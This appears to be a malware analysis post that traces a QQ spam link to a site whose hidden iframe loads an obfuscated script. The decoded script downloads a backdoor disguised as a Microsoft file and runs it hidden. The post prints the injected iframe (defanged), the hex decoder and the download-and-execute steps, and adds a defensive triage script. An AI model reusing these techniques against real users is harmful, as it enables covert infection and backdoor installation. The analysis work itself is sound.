Endurer (original post), version 1

The following message arrived via QQ:
/---
I just found a free online movie site with loads of passionate N-level films. The playback speed is quite fast! hxxp://p2p.m***m1***6***8***.info
---/
The home page of hxxp://p2p.m***m1***6***8***.info contains the following code:
/---
<IFRAME src="hxxp://sms.e***es***ms***s.com/m?#}.html" width="0" height="0" frameborder="0"></IFRAME>
---/
hxxp://sms.e***es***ms***s.com/m?##.html contains JavaScript code encrypted with CryptHTML XP (unregistered version).
The decrypted content consists of a piece of JavaScript code and a piece of VBScript code.
The JavaScript code is as follows:
/---
wc96 = 2956;
// IE branch: re-arm the context-menu block every 800 ms
if (document.all) {
    function _DM() { return false };
    function _MDM() { document.oncontextmenu = _DM; setTimeout("_MDM()", 800) };
    _MDM();
}
document.oncontextmenu = new Function("return false");
// Netscape/Mozilla branch: swallow any mouse button other than the left one
// (the extracted text showed a single "|" here; the logical "||" is what the
// comparison needs, since "object | object" evaluates to 0)
function _NDM(e) {
    if (document.layers || window.sidebar) {
        if (e.which != 1) return false;
    }
};
if (document.layers) {
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown = _NDM;
} else {
    document.onmouseup = _NDM;
};
vp56 = 4099;
cx26 = 958;
// IE: block text selection, re-armed every 700 ms
function _DDS() {
    if (document.all) {
        document.onselectstart = function () { return false };
        setTimeout("_DDS()", 700)
    }
};
_DDS();
ak86 = 2101; co98 = 7242; ty3 = 100; er10 = 2383; ex7 = 8673;
_licensed_to_ = "";
---/
Its only purpose is to define some junk variables and to disable the right-click menu (and, through onselectstart, text selection).
The value of the variable uurl in the VBScript code reveals that the malicious file to be downloaded is i.exe, hosted on another site.
The actual download-and-run routine, however, is stored in variable s.
The value of s is decoded by the following code:
/---
d = ""
' Decode s two hex digits at a time: each pair becomes one character of d.
' Note that the loop stops when only one character is left, so a trailing
' unpaired digit is silently dropped.
Do While Len(s) > 1
    k = "&H" + Left(s, 2)   ' "&H" prefix makes CLng parse the pair as hex
    p = CLng(k)
    m = Chr(p)
    d = d & m
    s = Mid(s, 3)          ' drop the two digits just consumed
Loop
---/
The decoded value of s is another piece of VBScript. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download i.exe and save it as %Temp%\pe.exe, then creates a file pe.vbs whose content calls shell.ShellExecute on %Temp%\pe.exe with the "open" verb and window mode 0 (hidden), and finally runs pe.exe through q.ShellExecute.
Here q is a Shell.Application object, and its ShellExecute method is what launches the program.
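As an added example (not code from the post or from the malware), the following Python re-implements the hex-pair decoder above, reproducing its dropped-trailing-digit quirk, and adds a small triage step that lists the COM ProgIDs and strings the decoded script relies on. The encoded sample is constructed here for demonstration.

```python
import re

# Equivalent of the VBScript loop in the post:
#   k = "&H" + Left(s, 2); p = CLng(k); d = d & Chr(p); s = Mid(s, 3)
# Like the original (Do While Len(s) > 1), a trailing unpaired hex digit is
# dropped; the second return value reports whether that happened.
def decode_hex_pairs(s: str) -> tuple[str, bool]:
    out = []
    truncated = len(s) % 2 == 1
    for i in range(0, len(s) - 1, 2):
        out.append(chr(int(s[i:i + 2], 16)))   # CLng("&H" & pair) -> Chr()
    return "".join(out), truncated

# COM ProgIDs and strings the post's payload depends on. Their presence in a
# decoded blob is what an analyst would flag for closer review.
INDICATORS = [
    "Microsoft.XMLHTTP",
    "Scripting.FileSystemObject",
    "Shell.Application",
    "ShellExecute",
    "%Temp%",
]

def triage(decoded: str) -> dict:
    """Return the indicators seen and every ProgID passed to CreateObject."""
    lowered = decoded.lower()
    found = [ind for ind in INDICATORS if ind.lower() in lowered]
    progids = sorted(set(re.findall(r'CreateObject\("([^"]+)"\)', decoded, re.I)))
    return {"indicators": found, "progids": progids}

# Constructed sample (not the real payload): a few VBScript lines, hex-encoded
# the same way variable s was, plus a stray trailing nibble to show the quirk.
SAMPLE_VBS = (
    'Set x = CreateObject("Microsoft.XMLHTTP")\r\n'
    'Set f = CreateObject("Scripting.FileSystemObject")\r\n'
    'Set q = CreateObject("Shell.Application")\r\n'
    "' pe.vbs then calls q.ShellExecute on %Temp%\\pe.exe"
)
SAMPLE_HEX = SAMPLE_VBS.encode("latin-1").hex().upper() + "A"

if __name__ == "__main__":
    decoded, truncated = decode_hex_pairs(SAMPLE_HEX)
    print(decoded)
    print("trailing odd digit dropped:", truncated)
    print(triage(decoded))
```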
File description: D:\test\i.exe
Attribute: ---
Language: English (USA)
File version: 5.2.20.0.1830
Note: ASN.2 Runtime APIs
Copyright: (c) Microsoft Corporation. All rights reserved.
Note:
Product Version: 5.2.20.0.1830
Product Name: Microsoft (r) Windows (r) Operating System
Company Name: Microsoft Corporation
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 22:46:57
Modification time: 22:46:58
Access time:
Size: 19498 bytes, 19.42 KB
MD5: 4d6df04ad8aaaa7537a9253b563b2d35
It impersonates a Microsoft file.

Scanned file: i.exe - infected
i.exe - infected by Backdoor.Win32.Agent.ahj

Statistics:
Known viruses: 280806
Updated: 12-03-2007
File size (Kb): 20
Virus bodies: 1
Files: 1
Warnings: 0
Archives: 0
Suspicious: 0